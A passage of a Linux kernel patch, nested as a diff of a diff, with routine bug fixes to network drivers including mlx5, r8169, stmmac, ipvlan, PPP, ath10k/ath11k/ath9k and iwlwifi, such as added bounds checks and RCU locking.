+@@ -671,16 +669,12 @@ int mlx5e_tc_tun_update_header_ipv6(struct mlx5e_priv *priv,
+ 	if (err)
+ 		goto free_encap;
+ 
+-	e->encap_size = ipv6_encap_size;
+-	kfree(e->encap_header);
+-	e->encap_header = encap_header;
+-
+ 	if (!(nud_state & NUD_VALID)) {
+ 		neigh_event_send(attr.n, NULL);
+ 		/* the encap entry will be made valid on neigh update event
+ 		 * and not used before that.
+ 		 */
+-		goto release_neigh;
++		goto free_encap;
+ 	}
+ 
+ 	memset(&reformat_params, 0, sizeof(reformat_params));
+@@ -694,6 +688,10 @@ int mlx5e_tc_tun_update_header_ipv6(struct mlx5e_priv *priv,
+ 		goto free_encap;
+ 	}
+ 
++	e->encap_size = ipv6_encap_size;
++	kfree(e->encap_header);
++	e->encap_header = encap_header;
++
+ 	e->flags |= MLX5_ENCAP_ENTRY_VALID;
+ 	mlx5e_rep_queue_neigh_stats_work(netdev_priv(attr.out_dev));
+ 	mlx5e_route_lookup_ipv6_put(&attr);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_ethtool.c b/drivers/net/ethernet/mellanox/mlx5/core/en_ethtool.c
+index 1728e197558d0..eeba91d9c5211 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_ethtool.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_ethtool.c
+@@ -43,12 +43,17 @@ void mlx5e_ethtool_get_drvinfo(struct mlx5e_priv *priv,
+ 			       struct ethtool_drvinfo *drvinfo)
+ {
+ 	struct mlx5_core_dev *mdev = priv->mdev;
++	int count;
+ 
+ 	strscpy(drvinfo->driver, KBUILD_MODNAME, sizeof(drvinfo->driver));
+-	snprintf(drvinfo->fw_version, sizeof(drvinfo->fw_version),
+-		 "%d.%d.%04d (%.16s)",
+-		 fw_rev_maj(mdev), fw_rev_min(mdev), fw_rev_sub(mdev),
+-		 mdev->board_id);
++	count = snprintf(drvinfo->fw_version, sizeof(drvinfo->fw_version),
++			 "%d.%d.%04d (%.16s)", fw_rev_maj(mdev),
++			 fw_rev_min(mdev), fw_rev_sub(mdev), mdev->board_id);
++	if (count == sizeof(drvinfo->fw_version))
++		snprintf(drvinfo->fw_version, sizeof(drvinfo->fw_version),
++			 "%d.%d.%04d", fw_rev_maj(mdev),
++			 fw_rev_min(mdev), fw_rev_sub(mdev));
++
+ 	strscpy(drvinfo->bus_info, dev_name(mdev->device),
+ 		sizeof(drvinfo->bus_info));
+ }
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_rep.c b/drivers/net/ethernet/mellanox/mlx5/core/en_rep.c
+index bd895ef341a0b..2653cb96c3105 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_rep.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_rep.c
+@@ -69,13 +69,17 @@ static void mlx5e_rep_get_drvinfo(struct net_device *dev,
+ {
+ 	struct mlx5e_priv *priv = netdev_priv(dev);
+ 	struct mlx5_core_dev *mdev = priv->mdev;
++	int count;
+ 
+ 	strscpy(drvinfo->driver, mlx5e_rep_driver_name,
+ 		sizeof(drvinfo->driver));
+-	snprintf(drvinfo->fw_version, sizeof(drvinfo->fw_version),
+-		 "%d.%d.%04d (%.16s)",
+-		 fw_rev_maj(mdev), fw_rev_min(mdev),
+-		 fw_rev_sub(mdev), mdev->board_id);
++	count = snprintf(drvinfo->fw_version, sizeof(drvinfo->fw_version),
++			 "%d.%d.%04d (%.16s)", fw_rev_maj(mdev),
++			 fw_rev_min(mdev), fw_rev_sub(mdev), mdev->board_id);
++	if (count == sizeof(drvinfo->fw_version))
++		snprintf(drvinfo->fw_version, sizeof(drvinfo->fw_version),
++			 "%d.%d.%04d", fw_rev_maj(mdev),
++			 fw_rev_min(mdev), fw_rev_sub(mdev));
+ }
+ 
+ static const struct counter_desc sw_rep_stats_desc[] = {
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_tc.c b/drivers/net/ethernet/mellanox/mlx5/core/en_tc.c
+index 7ab489520a873..43239555f7850 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_tc.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_tc.c
+@@ -3102,7 +3102,7 @@ static struct mlx5_fields fields[] = {
+ 	OFFLOAD(DIPV6_31_0,   32, U32_MAX, ip6.daddr.s6_addr32[3], 0,
+ 		dst_ipv4_dst_ipv6.ipv6_layout.ipv6[12]),
+ 	OFFLOAD(IPV6_HOPLIMIT, 8,  U8_MAX, ip6.hop_limit, 0, ttl_hoplimit),
+-	OFFLOAD(IP_DSCP, 16,  0xc00f, ip6, 0, ip_dscp),
++	OFFLOAD(IP_DSCP, 16,  0x0fc0, ip6, 0, ip_dscp),
+ 
+ 	OFFLOAD(TCP_SPORT, 16, U16_MAX, tcp.source,  0, tcp_sport),
+ 	OFFLOAD(TCP_DPORT, 16, U16_MAX, tcp.dest,    0, tcp_dport),
+@@ -3113,21 +3113,31 @@ static struct mlx5_fields fields[] = {
+ 	OFFLOAD(UDP_DPORT, 16, U16_MAX, udp.dest,   0, udp_dport),
+ };
+ 
+-static unsigned long mask_to_le(unsigned long mask, int size)
++static u32 mask_field_get(void *mask, struct mlx5_fields *f)
+ {
+-	__be32 mask_be32;
+-	__be16 mask_be16;
+-
+-	if (size == 32) {
+-		mask_be32 = (__force __be32)(mask);
+-		mask = (__force unsigned long)cpu_to_le32(be32_to_cpu(mask_be32));
+-	} else if (size == 16) {
+-		mask_be32 = (__force __be32)(mask);
+-		mask_be16 = *(__be16 *)&mask_be32;
+-		mask = (__force unsigned long)cpu_to_le16(be16_to_cpu(mask_be16));
++	switch (f->field_bsize) {
++	case 32:
++		return be32_to_cpu(*(__be32 *)mask) & f->field_mask;
++	case 16:
++		return be16_to_cpu(*(__be16 *)mask) & (u16)f->field_mask;
++	default:
++		return *(u8 *)mask & (u8)f->field_mask;
+ 	}
++}
+ 
+-	return mask;
++static void mask_field_clear(void *mask, struct mlx5_fields *f)
++{
++	switch (f->field_bsize) {
++	case 32:
++		*(__be32 *)mask &= ~cpu_to_be32(f->field_mask);
++		break;
++	case 16:
++		*(__be16 *)mask &= ~cpu_to_be16((u16)f->field_mask);
++		break;
++	default:
++		*(u8 *)mask &= ~(u8)f->field_mask;
++		break;
++	}
+ }
+ 
+ static int offload_pedit_fields(struct mlx5e_priv *priv,
+@@ -3139,11 +3149,12 @@ static int offload_pedit_fields(struct mlx5e_priv *priv,
+ 	struct pedit_headers *set_masks, *add_masks, *set_vals, *add_vals;
+ 	struct pedit_headers_action *hdrs = parse_attr->hdrs;
+ 	void *headers_c, *headers_v, *action, *vals_p;
+-	u32 *s_masks_p, *a_masks_p, s_mask, a_mask;
+ 	struct mlx5e_tc_mod_hdr_acts *mod_acts;
+-	unsigned long mask, field_mask;
++	void *s_masks_p, *a_masks_p;
+ 	int i, first, last, next_z;
+ 	struct mlx5_fields *f;
++	unsigned long mask;
++	u32 s_mask, a_mask;
+ 	u8 cmd;
+ 
+ 	mod_acts = &parse_attr->mod_hdr_acts;
+@@ -3159,15 +3170,11 @@ static int offload_pedit_fields(struct mlx5e_priv *priv,
+ 		bool skip;
+ 
+ 		f = &fields[i];
+-		/* avoid seeing bits set from previous iterations */
+-		s_mask = 0;
+-		a_mask = 0;
+-
+ 		s_masks_p = (void *)set_masks + f->offset;
+ 		a_masks_p = (void *)add_masks + f->offset;
+ 
+-		s_mask = *s_masks_p & f->field_mask;
+-		a_mask = *a_masks_p & f->field_mask;
++		s_mask = mask_field_get(s_masks_p, f);
++		a_mask = mask_field_get(a_masks_p, f);
+ 
+ 		if (!s_mask && !a_mask) /* nothing to offload here */
+ 			continue;
+@@ -3194,22 +3201,20 @@ static int offload_pedit_fields(struct mlx5e_priv *priv,
+ 					 match_mask, f->field_bsize))
+ 				skip = true;
+ 			/* clear to denote we consumed this field */
+-			*s_masks_p &= ~f->field_mask;
++			mask_field_clear(s_masks_p, f);
+ 		} else {
+ 			cmd  = MLX5_ACTION_TYPE_ADD;
+ 			mask = a_mask;
+ 			vals_p = (void *)add_vals + f->offset;
+ 			/* add 0 is no change */
+-			if ((*(u32 *)vals_p & f->field_mask) == 0)
++			if (!mask_field_get(vals_p, f))
+ 				skip = true;
+ 			/* clear to denote we consumed this field */
+-			*a_masks_p &= ~f->field_mask;
++			mask_field_clear(a_masks_p, f);
+ 		}
+ 		if (skip)
+ 			continue;
+ 
+-		mask = mask_to_le(mask, f->field_bsize);
+-
+ 		first = find_first_bit(&mask, f->field_bsize);
+ 		next_z = find_next_zero_bit(&mask, f->field_bsize, first);
+ 		last  = find_last_bit(&mask, f->field_bsize);
+@@ -3236,10 +3241,9 @@ static int offload_pedit_fields(struct mlx5e_priv *priv,
+ 		MLX5_SET(set_action_in, action, field, f->field);
+ 
+ 		if (cmd == MLX5_ACTION_TYPE_SET) {
++			unsigned long field_mask = f->field_mask;
+ 			int start;
+ 
+-			field_mask = mask_to_le(f->field_mask, f->field_bsize);
+-
+ 			/* if field is bit sized it can start not from first bit */
+ 			start = find_first_bit(&field_mask, f->field_bsize);
+ 
+diff --git a/drivers/net/ethernet/realtek/r8169_main.c b/drivers/net/ethernet/realtek/r8169_main.c
+index d14706265d9cb..770391cefb4e4 100644
+--- a/drivers/net/ethernet/realtek/r8169_main.c
++++ b/drivers/net/ethernet/realtek/r8169_main.c
+@@ -614,6 +614,7 @@ struct rtl8169_private {
+ 
+ 	unsigned supports_gmii:1;
+ 	unsigned aspm_manageable:1;
++	unsigned dash_enabled:1;
+ 	dma_addr_t counters_phys_addr;
+ 	struct rtl8169_counters *counters;
+ 	struct rtl8169_tc_offsets tc_offset;
+@@ -1186,14 +1187,26 @@ static bool r8168ep_check_dash(struct rtl8169_private *tp)
+ 	return r8168ep_ocp_read(tp, 0x128) & BIT(0);
+ }
+ 
+-static enum rtl_dash_type rtl_check_dash(struct rtl8169_private *tp)
++static bool rtl_dash_is_enabled(struct rtl8169_private *tp)
++{
++	switch (tp->dash_type) {
++	case RTL_DASH_DP:
++		return r8168dp_check_dash(tp);
++	case RTL_DASH_EP:
++		return r8168ep_check_dash(tp);
++	default:
++		return false;
++	}
++}
++
++static enum rtl_dash_type rtl_get_dash_type(struct rtl8169_private *tp)
+ {
+ 	switch (tp->mac_version) {
+ 	case RTL_GIGA_MAC_VER_28:
+ 	case RTL_GIGA_MAC_VER_31:
+-		return r8168dp_check_dash(tp) ? RTL_DASH_DP : RTL_DASH_NONE;
++		return RTL_DASH_DP;
+ 	case RTL_GIGA_MAC_VER_51 ... RTL_GIGA_MAC_VER_53:
+-		return r8168ep_check_dash(tp) ? RTL_DASH_EP : RTL_DASH_NONE;
++		return RTL_DASH_EP;
+ 	default:
+ 		return RTL_DASH_NONE;
+ 	}
+@@ -1383,7 +1396,7 @@ static void __rtl8169_set_wol(struct rtl8169_private *tp, u32 wolopts)
+ 
+ 	device_set_wakeup_enable(tp_to_dev(tp), wolopts);
+ 
+-	if (tp->dash_type == RTL_DASH_NONE) {
++	if (!tp->dash_enabled) {
+ 		rtl_set_d3_pll_down(tp, !wolopts);
+ 		tp->dev->wol_enabled = wolopts ? 1 : 0;
+ 	}
+@@ -2442,7 +2455,7 @@ static void rtl_wol_enable_rx(struct rtl8169_private *tp)
+ 
+ static void rtl_prepare_power_down(struct rtl8169_private *tp)
+ {
+-	if (tp->dash_type != RTL_DASH_NONE)
++	if (tp->dash_enabled)
+ 		return;
+ 
+ 	if (tp->mac_version == RTL_GIGA_MAC_VER_32 ||
+@@ -2516,9 +2529,7 @@ static void rtl_set_rx_mode(struct net_device *dev)
+ 		rx_mode &= ~AcceptMulticast;
+ 	} else if (netdev_mc_count(dev) > MC_FILTER_LIMIT ||
+ 		   dev->flags & IFF_ALLMULTI ||
+-		   tp->mac_version == RTL_GIGA_MAC_VER_35 ||
+-		   tp->mac_version == RTL_GIGA_MAC_VER_46 ||
+-		   tp->mac_version == RTL_GIGA_MAC_VER_48) {
++		   tp->mac_version == RTL_GIGA_MAC_VER_35) {
+ 		/* accept all multicasts */
+ 	} else if (netdev_mc_empty(dev)) {
+ 		rx_mode &= ~AcceptMulticast;
+@@ -4613,10 +4624,16 @@ static void rtl8169_down(struct rtl8169_private *tp)
+ 	rtl8169_cleanup(tp);
+ 	rtl_disable_exit_l1(tp);
+ 	rtl_prepare_power_down(tp);
++
++	if (tp->dash_type != RTL_DASH_NONE)
++		rtl8168_driver_stop(tp);
+ }
+ 
+ static void rtl8169_up(struct rtl8169_private *tp)
+ {
++	if (tp->dash_type != RTL_DASH_NONE)
++		rtl8168_driver_start(tp);
++
+ 	pci_set_master(tp->pci_dev);
+ 	phy_init_hw(tp->phydev);
+ 	phy_resume(tp->phydev);
+@@ -4834,7 +4851,7 @@ static int rtl8169_runtime_idle(struct device *device)
+ {
+ 	struct rtl8169_private *tp = dev_get_drvdata(device);
+ 
+-	if (tp->dash_type != RTL_DASH_NONE)
++	if (tp->dash_enabled)
+ 		return -EBUSY;
+ 
+ 	if (!netif_running(tp->dev) || !netif_carrier_ok(tp->dev))
+@@ -4860,8 +4877,7 @@ static void rtl_shutdown(struct pci_dev *pdev)
+ 	/* Restore original MAC address */
+ 	rtl_rar_set(tp, tp->dev->perm_addr);
+ 
+-	if (system_state == SYSTEM_POWER_OFF &&
+-	    tp->dash_type == RTL_DASH_NONE) {
++	if (system_state == SYSTEM_POWER_OFF && !tp->dash_enabled) {
+ 		pci_wake_from_d3(pdev, tp->saved_wolopts);
+ 		pci_set_power_state(pdev, PCI_D3hot);
+ 	}
+@@ -5217,7 +5233,8 @@ static int rtl_init_one(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 		rc = pci_disable_link_state(pdev, PCIE_LINK_STATE_L1);
+ 	tp->aspm_manageable = !rc;
+ 
+-	tp->dash_type = rtl_check_dash(tp);
++	tp->dash_type = rtl_get_dash_type(tp);
++	tp->dash_enabled = rtl_dash_is_enabled(tp);
+ 
+ 	tp->cp_cmd = RTL_R16(tp, CPlusCmd) & CPCMD_MASK;
+ 
+@@ -5287,7 +5304,7 @@ static int rtl_init_one(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 	/* configure chip for default features */
+ 	rtl8169_set_features(dev, dev->features);
+ 
+-	if (tp->dash_type == RTL_DASH_NONE) {
++	if (!tp->dash_enabled) {
+ 		rtl_set_d3_pll_down(tp, true);
+ 	} else {
+ 		rtl_set_d3_pll_down(tp, false);
+@@ -5327,7 +5344,8 @@ static int rtl_init_one(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 			    "ok" : "ko");
+ 
+ 	if (tp->dash_type != RTL_DASH_NONE) {
+-		netdev_info(dev, "DASH enabled\n");
++		netdev_info(dev, "DASH %s\n",
++			    tp->dash_enabled ? "enabled" : "disabled");
+ 		rtl8168_driver_start(tp);
+ 	}
+ 
+diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+index 1559a4dafd413..9f76c2f7d513b 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
++++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+@@ -5198,6 +5198,7 @@ static int stmmac_rx(struct stmmac_priv *priv, int limit, u32 queue)
+ 
+ 	dma_dir = page_pool_get_dma_dir(rx_q->page_pool);
+ 	buf_sz = DIV_ROUND_UP(priv->dma_conf.dma_buf_sz, PAGE_SIZE) * PAGE_SIZE;
++	limit = min(priv->dma_conf.dma_rx_size - 1, (unsigned int)limit);
+ 
+ 	if (netif_msg_rx_status(priv)) {
+ 		void *rx_head;
+@@ -5233,10 +5234,10 @@ static int stmmac_rx(struct stmmac_priv *priv, int limit, u32 queue)
+ 			len = 0;
+ 		}
+ 
++read_again:
+ 		if (count >= limit)
+ 			break;
+ 
+-read_again:
+ 		buf1_len = 0;
+ 		buf2_len = 0;
+ 		entry = next_entry;
+diff --git a/drivers/net/ipvlan/ipvlan_core.c b/drivers/net/ipvlan/ipvlan_core.c
+index b29b7d97b7739..d447f3076e24a 100644
+--- a/drivers/net/ipvlan/ipvlan_core.c
++++ b/drivers/net/ipvlan/ipvlan_core.c
+@@ -411,7 +411,7 @@ struct ipvl_addr *ipvlan_addr_lookup(struct ipvl_port *port, void *lyr3h,
+ 	return addr;
+ }
+ 
+-static int ipvlan_process_v4_outbound(struct sk_buff *skb)
++static noinline_for_stack int ipvlan_process_v4_outbound(struct sk_buff *skb)
+ {
+ 	const struct iphdr *ip4h = ip_hdr(skb);
+ 	struct net_device *dev = skb->dev;
+@@ -453,13 +453,11 @@ out:
+ }
+ 
+ #if IS_ENABLED(CONFIG_IPV6)
+-static int ipvlan_process_v6_outbound(struct sk_buff *skb)
++
++static noinline_for_stack int
++ipvlan_route_v6_outbound(struct net_device *dev, struct sk_buff *skb)
+ {
+ 	const struct ipv6hdr *ip6h = ipv6_hdr(skb);
+-	struct net_device *dev = skb->dev;
+-	struct net *net = dev_net(dev);
+-	struct dst_entry *dst;
+-	int err, ret = NET_XMIT_DROP;
+ 	struct flowi6 fl6 = {
+ 		.flowi6_oif = dev->ifindex,
+ 		.daddr = ip6h->daddr,
+@@ -469,27 +467,38 @@ static int ipvlan_process_v6_outbound(struct sk_buff *skb)
+ 		.flowi6_mark = skb->mark,
+ 		.flowi6_proto = ip6h->nexthdr,
+ 	};
++	struct dst_entry *dst;
++	int err;
+ 
+-	dst = ip6_route_output(net, NULL, &fl6);
+-	if (dst->error) {
+-		ret = dst->error;
++	dst = ip6_route_output(dev_net(dev), NULL, &fl6);
++	err = dst->error;
++	if (err) {
+ 		dst_release(dst);
+-		goto err;
++		return err;
+ 	}
+ 	skb_dst_set(skb, dst);
++	return 0;
++}
++
++static int ipvlan_process_v6_outbound(struct sk_buff *skb)
++{
++	struct net_device *dev = skb->dev;
++	int err, ret = NET_XMIT_DROP;
++
++	err = ipvlan_route_v6_outbound(dev, skb);
++	if (unlikely(err)) {
++		DEV_STATS_INC(dev, tx_errors);
++		kfree_skb(skb);
++		return err;
++	}
+ 
+ 	memset(IP6CB(skb), 0, sizeof(*IP6CB(skb)));
+ 
+-	err = ip6_local_out(net, skb->sk, skb);
++	err = ip6_local_out(dev_net(dev), skb->sk, skb);
+ 	if (unlikely(net_xmit_eval(err)))
+ 		DEV_STATS_INC(dev, tx_errors);
+ 	else
+ 		ret = NET_XMIT_SUCCESS;
+-	goto out;
+-err:
+-	DEV_STATS_INC(dev, tx_errors);
+-	kfree_skb(skb);
+-out:
+ 	return ret;
+ }
+ #else
+diff --git a/drivers/net/macvlan.c b/drivers/net/macvlan.c
+index b8cc55b2d721c..012830d12fde6 100644
+--- a/drivers/net/macvlan.c
++++ b/drivers/net/macvlan.c
+@@ -771,7 +771,7 @@ static void macvlan_change_rx_flags(struct net_device *dev, int change)
+ 	if (dev->flags & IFF_UP) {
+ 		if (change & IFF_ALLMULTI)
+ 			dev_set_allmulti(lowerdev, dev->flags & IFF_ALLMULTI ? 1 : -1);
+-		if (change & IFF_PROMISC)
++		if (!macvlan_passthru(vlan->port) && change & IFF_PROMISC)
+ 			dev_set_promiscuity(lowerdev,
+ 					    dev->flags & IFF_PROMISC ? 1 : -1);
+ 
+diff --git a/drivers/net/phy/phylink.c b/drivers/net/phy/phylink.c
+index 5b064a1de92f0..fc58e4afb38dd 100644
+--- a/drivers/net/phy/phylink.c
++++ b/drivers/net/phy/phylink.c
+@@ -1479,6 +1479,7 @@ struct phylink *phylink_create(struct phylink_config *config,
+ 	pl->config = config;
+ 	if (config->type == PHYLINK_NETDEV) {
+ 		pl->netdev = to_net_dev(config->dev);
++		netif_carrier_off(pl->netdev);
+ 	} else if (config->type == PHYLINK_DEV) {
+ 		pl->dev = config->dev;
+ 	} else {
+diff --git a/drivers/net/ppp/ppp_synctty.c b/drivers/net/ppp/ppp_synctty.c
+index 18283b7b94bcd..94ef6f9ca5103 100644
+--- a/drivers/net/ppp/ppp_synctty.c
++++ b/drivers/net/ppp/ppp_synctty.c
+@@ -462,6 +462,10 @@ ppp_sync_ioctl(struct ppp_channel *chan, unsigned int cmd, unsigned long arg)
+ 	case PPPIOCSMRU:
+ 		if (get_user(val, (int __user *) argp))
+ 			break;
++		if (val > U16_MAX) {
++			err = -EINVAL;
++			break;
++		}
+ 		if (val < PPP_MRU)
+ 			val = PPP_MRU;
+ 		ap->mru = val;
+@@ -697,7 +701,7 @@ ppp_sync_input(struct syncppp *ap, const unsigned char *buf,
+ 
+ 	/* strip address/control field if present */
+ 	p = skb->data;
+-	if (p[0] == PPP_ALLSTATIONS && p[1] == PPP_UI) {
++	if (skb->len >= 2 && p[0] == PPP_ALLSTATIONS && p[1] == PPP_UI) {
+ 		/* chop off address/control */
+ 		if (skb->len < 3)
+ 			goto err;
+diff --git a/drivers/net/wireless/ath/ath10k/debug.c b/drivers/net/wireless/ath/ath10k/debug.c
+index c861e66ef6bc5..41f387e15dcd0 100644
+--- a/drivers/net/wireless/ath/ath10k/debug.c
++++ b/drivers/net/wireless/ath/ath10k/debug.c
+@@ -1139,7 +1139,7 @@ void ath10k_debug_get_et_strings(struct ieee80211_hw *hw,
+ 				 u32 sset, u8 *data)
+ {
+ 	if (sset == ETH_SS_STATS)
+-		memcpy(data, *ath10k_gstrings_stats,
++		memcpy(data, ath10k_gstrings_stats,
+ 		       sizeof(ath10k_gstrings_stats));
+ }
+ 
+diff --git a/drivers/net/wireless/ath/ath10k/snoc.c b/drivers/net/wireless/ath/ath10k/snoc.c
+index cfcb759a87dea..4b7266d928470 100644
+--- a/drivers/net/wireless/ath/ath10k/snoc.c
++++ b/drivers/net/wireless/ath/ath10k/snoc.c
+@@ -828,12 +828,20 @@ static void ath10k_snoc_hif_get_default_pipe(struct ath10k *ar,
+ 
+ static inline void ath10k_snoc_irq_disable(struct ath10k *ar)
+ {
+-	ath10k_ce_disable_interrupts(ar);
++	struct ath10k_snoc *ar_snoc = ath10k_snoc_priv(ar);
++	int id;
++
++	for (id = 0; id < CE_COUNT_MAX; id++)
++		disable_irq(ar_snoc->ce_irqs[id].irq_line);
+ }
+ 
+ static inline void ath10k_snoc_irq_enable(struct ath10k *ar)
+ {
+-	ath10k_ce_enable_interrupts(ar);
++	struct ath10k_snoc *ar_snoc = ath10k_snoc_priv(ar);
++	int id;
++
++	for (id = 0; id < CE_COUNT_MAX; id++)
++		enable_irq(ar_snoc->ce_irqs[id].irq_line);
+ }
+ 
+ static void ath10k_snoc_rx_pipe_cleanup(struct ath10k_snoc_pipe *snoc_pipe)
+@@ -1089,6 +1097,8 @@ static int ath10k_snoc_hif_power_up(struct ath10k *ar,
+ 		goto err_free_rri;
+ 	}
+ 
++	ath10k_ce_enable_interrupts(ar);
++
+ 	return 0;
+ 
+ err_free_rri:
+@@ -1252,8 +1262,8 @@ static int ath10k_snoc_request_irq(struct ath10k *ar)
+ 
+ 	for (id = 0; id < CE_COUNT_MAX; id++) {
+ 		ret = request_irq(ar_snoc->ce_irqs[id].irq_line,
+-				  ath10k_snoc_per_engine_handler, 0,
+-				  ce_name[id], ar);
++				  ath10k_snoc_per_engine_handler,
++				  IRQF_NO_AUTOEN, ce_name[id], ar);
+ 		if (ret) {
+ 			ath10k_err(ar,
+ 				   "failed to register IRQ handler for CE %d: %d\n",
+diff --git a/drivers/net/wireless/ath/ath11k/dp_rx.c b/drivers/net/wireless/ath/ath11k/dp_rx.c
+index 38be646bc0214..b1067bcdf88a5 100644
+--- a/drivers/net/wireless/ath/ath11k/dp_rx.c
++++ b/drivers/net/wireless/ath/ath11k/dp_rx.c
+@@ -1621,14 +1621,20 @@ static void ath11k_htt_pktlog(struct ath11k_base *ab, struct sk_buff *skb)
+ 	u8 pdev_id;
+ 
+ 	pdev_id = FIELD_GET(HTT_T2H_PPDU_STATS_INFO_PDEV_ID, data->hdr);
++
++	rcu_read_lock();
++
+ 	ar = ath11k_mac_get_ar_by_pdev_id(ab, pdev_id);
+ 	if (!ar) {
+ 		ath11k_warn(ab, "invalid pdev id %d on htt pktlog\n", pdev_id);
+-		return;
++		goto out;
+ 	}
+ 
+ 	trace_ath11k_htt_pktlog(ar, data->payload, hdr->size,
+ 				ar->ab->pktlog_defs_checksum);
++
++out:
++	rcu_read_unlock();
+ }
+ 
+ static void ath11k_htt_backpressure_event_handler(struct ath11k_base *ab,
+diff --git a/drivers/net/wireless/ath/ath11k/wmi.c b/drivers/net/wireless/ath/ath11k/wmi.c
+index 3e0a47f4a3ebd..142b201052660 100644
+--- a/drivers/net/wireless/ath/ath11k/wmi.c
++++ b/drivers/net/wireless/ath/ath11k/wmi.c
+@@ -7729,6 +7729,8 @@ ath11k_wmi_pdev_dfs_radar_detected_event(struct ath11k_base *ab, struct sk_buff
+ 		   ev->detector_id, ev->segment_id, ev->timestamp, ev->is_chirp,
+ 		   ev->freq_offset, ev->sidx);
+ 
++	rcu_read_lock();
++
+ 	ar = ath11k_mac_get_ar_by_pdev_id(ab, ev->pdev_id);
+ 
+ 	if (!ar) {
+@@ -7746,6 +7748,8 @@ ath11k_wmi_pdev_dfs_radar_detected_event(struct ath11k_base *ab, struct sk_buff
+ 		ieee80211_radar_detected(ar->hw);
+ 
+ exit:
++	rcu_read_unlock();
++
+ 	kfree(tb);
+ }
+ 
+@@ -7775,15 +7779,19 @@ ath11k_wmi_pdev_temperature_event(struct ath11k_base *ab,
+ 	ath11k_dbg(ab, ATH11K_DBG_WMI,
+ 		   "pdev temperature ev temp %d pdev_id %d\n", ev->temp, ev->pdev_id);
+ 
++	rcu_read_lock();
++
+ 	ar = ath11k_mac_get_ar_by_pdev_id(ab, ev->pdev_id);
+ 	if (!ar) {
+ 		ath11k_warn(ab, "invalid pdev id in pdev temperature ev %d", ev->pdev_id);
+-		kfree(tb);
+-		return;
++		goto exit;
+ 	}
+ 
+ 	ath11k_thermal_event_temperature(ar, ev->temp);
+ 
++exit:
++	rcu_read_unlock();
++
+ 	kfree(tb);
+ }
+ 
+@@ -7993,12 +8001,13 @@ static void ath11k_wmi_gtk_offload_status_event(struct ath11k_base *ab,
+ 		return;
+ 	}
+ 
++	rcu_read_lock();
++
+ 	arvif = ath11k_mac_get_arvif_by_vdev_id(ab, ev->vdev_id);
+ 	if (!arvif) {
+ 		ath11k_warn(ab, "failed to get arvif for vdev_id:%d\n",
+ 			    ev->vdev_id);
+-		kfree(tb);
+-		return;
++		goto exit;
+ 	}
+ 
+ 	ath11k_dbg(ab, ATH11K_DBG_WMI, "wmi gtk offload event refresh_cnt %d\n",
+@@ -8015,6 +8024,8 @@ static void ath11k_wmi_gtk_offload_status_event(struct ath11k_base *ab,
+ 
+ 	ieee80211_gtk_rekey_notify(arvif->vif, arvif->bssid,
+ 				   (void *)&replay_ctr_be, GFP_ATOMIC);
++exit:
++	rcu_read_unlock();
+ 
+ 	kfree(tb);
+ }
+diff --git a/drivers/net/wireless/ath/ath9k/debug.c b/drivers/net/wireless/ath/ath9k/debug.c
+index fb7a2952d0ce8..d9bac1c343490 100644
+--- a/drivers/net/wireless/ath/ath9k/debug.c
++++ b/drivers/net/wireless/ath/ath9k/debug.c
+@@ -1333,7 +1333,7 @@ void ath9k_get_et_strings(struct ieee80211_hw *hw,
+ 			  u32 sset, u8 *data)
+ {
+ 	if (sset == ETH_SS_STATS)
+-		memcpy(data, *ath9k_gstrings_stats,
++		memcpy(data, ath9k_gstrings_stats,
+ 		       sizeof(ath9k_gstrings_stats));
+ }
+ 
+diff --git a/drivers/net/wireless/ath/ath9k/htc_drv_debug.c b/drivers/net/wireless/ath/ath9k/htc_drv_debug.c
+index c55aab01fff5d..e79bbcd3279af 100644
+--- a/drivers/net/wireless/ath/ath9k/htc_drv_debug.c
++++ b/drivers/net/wireless/ath/ath9k/htc_drv_debug.c
+@@ -428,7 +428,7 @@ void ath9k_htc_get_et_strings(struct ieee80211_hw *hw,
+ 			      u32 sset, u8 *data)
+ {
+ 	if (sset == ETH_SS_STATS)
+-		memcpy(data, *ath9k_htc_gstrings_stats,
++		memcpy(data, ath9k_htc_gstrings_stats,
+ 		       sizeof(ath9k_htc_gstrings_stats));
+ }
+ 
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/tx.c b/drivers/net/wireless/intel/iwlwifi/mvm/tx.c
+index 618355ecd9d7b..caaf4d52e2c64 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/tx.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/tx.c
+@@ -524,16 +524,20 @@ iwl_mvm_set_tx_params(struct iwl_mvm *mvm, struct sk_buff *skb,
+ 			flags |= IWL_TX_FLAGS_ENCRYPT_DIS;
+ 
+ 		/*
+-		 * For data packets rate info comes from the fw. Only
+-		 * set rate/antenna during connection establishment or in case
+-		 * no station is given.
++		 * For data and mgmt packets rate info comes from the fw. Only
++		 * set rate/antenna for injected frames with fixed rate, or
++		 * when no sta is given.
+ 		 */
+-		if (!sta || !ieee80211_is_data(hdr->frame_control) ||
+-		    mvmsta->sta_state < IEEE80211_STA_AUTHORIZED) {
++		if (unlikely(!sta ||
++			     info->control.flags & IEEE80211_TX_CTRL_RATE_INJECT)) {
+ 			flags |= IWL_TX_FLAGS_CMD_RATE;
+ 			rate_n_flags =
+ 				iwl_mvm_get_tx_rate_n_flags(mvm, info, sta,
+ 							    hdr->frame_control);
++		} else if (!ieee80211_is_data(hdr->frame_control) ||
++			   mvmsta->sta_state < IEEE80211_STA_AUTHORIZED) {
++			/* These are important frames */
++			flags |= IWL_TX_FLAGS_HIGH_PRI;
+ 		}
+ 
+ 		if (mvm->trans->trans_cfg->device_family >=
+diff --git a/drivers/net/wireless/mac80211_hwsim.c b/drivers/net/wireless/mac80211_hwsim.c
+index db70cef854bc4..abcd165a62cfe 100644
